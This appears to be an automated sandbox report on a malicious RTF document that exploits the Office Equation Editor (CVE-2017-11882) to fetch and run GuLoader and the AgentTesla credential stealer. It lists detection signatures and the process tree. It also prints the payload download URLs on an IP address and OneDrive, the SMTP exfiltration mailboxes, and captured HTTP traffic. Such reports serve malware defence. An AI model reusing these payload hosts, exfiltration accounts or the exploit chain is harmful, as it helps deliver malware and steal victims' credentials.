Play interactive tour

Edit tour

Windows Analysis Report T81Ip9NCGi

Overview

General Information

Sample Name:	T81Ip9NCGi (renamed file extension from none to rtf)
Analysis ID:	532227
MD5:	79b064007e51e1cfb2f7c91c732242a9
SHA1:	c4748fd11683b4b02e5bbc13746005a023f66568
SHA256:	b5784dc5717d0733bcdd150fda07cc94bcc2e2529e0f03e3bb9ec9b623302496
Tags:	rtf
Infos:
Most interesting Screenshot:

Detection

GuLoader AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Antivirus / Scanner detection for submitted sample

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

GuLoader behavior detected

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

Yara detected Credential Stealer

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 1124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2836 cmdline: "C:\Users\Public\vbc.exe" MD5: 99BDB5995C8DD619A3EC2B799D1CF868)

Acly3.exe (PID: 2804 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: E32061DA9B34B82E0AB5D0E53CAF5A09)

CasPol.exe (PID: 2524 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)

CasPol.exe (PID: 2052 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)

CasPol.exe (PID: 672 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)

misv.exe (PID: 2812 cmdline: "C:\Users\user\AppData\Roaming\misv.exe" MD5: 1DA682EC8DCBC375B6E76660EF46D3FD)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 192.3.122.180, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2836

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}
Source: CasPol.exe.672.9.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: T81Ip9NCGi.rtf

ReversingLabs: Detection: 35%

Antivirus / Scanner detection for submitted sample

Show sources

Source: T81Ip9NCGi.rtf

Avira: detected

Antivirus detection for URL or domain

Show sources

Source: http://192.3.122.180/1100/vbc.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 20%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\misv.exe

Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Acly3.pdb source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0040290B FindFirstFileW,

Source: global traffic

DNS query: name: onedrive.live.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://onedrive.live.com/download?cid=5A15FDA1AE9

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Dec 2021 19:57:58 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Wed, 01 Dec 2021 09:20:35 GMTETag: "2020b-5d2122fb5045c"Accept-Ranges: bytesContent-Length: 131595Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.122.180Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.122.180

Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000003.00000000.411004691.000000000040A000.00000008.00020000.sdmp, misv.exe, 0000000C.00000000.670443220.000000000040A000.00000008.00020000.sdmp, vbc.exe.1.dr, vbc[1].exe.1.dr, misv.exe.9.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: http://s.symcd.com06
Source: WINWORD.EXE, 00000000.00000002.566986051.00000000077FE000.00000004.00000001.sdmp	String found in binary or memory: http://scas.openformatrg/drawml/2006/main
Source: WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	String found in binary or memory: https://eruitg.bl.files.1drv.com/
Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	String found in binary or memory: https://eruitg.bl.files.1drv.com/y4muNEzpitWvAmX7Vz4E733dpYGfCYrMWu-PvveEpyz1hNKqOgAXlUDzjcpY7W274Qg
Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	String found in binary or memory: https://fspzka.bl.files.1drv.com/
Source: CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmp	String found in binary or memory: https://fspzka.bl.files.1drv.com/lU)
Source: CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	String found in binary or memory: https://fspzka.bl.files.1drv.com/y4mA4TmJkclcR_hxludBD4dX7tD1sUxzesfsAA1g8l7yxjN7FTtZtQscxnySO3fUefx
Source: CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmp	String found in binary or memory: https://fspzka.bl.files.1drv.com/y4mP7_EzD4E9pJoVHXNCm_aHG9sNUYaYn5ZLxRh4dzJ2jsCGVhpiD6B5BkejNSybMdS
Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6X
Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.680070003.0000000000884000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200
Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/w
Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAA38BD7-6E2E-4485-B33A-19C659167A7E}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: global traffic

Source: C:\Users\Public\vbc.exe

Code function: 3_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

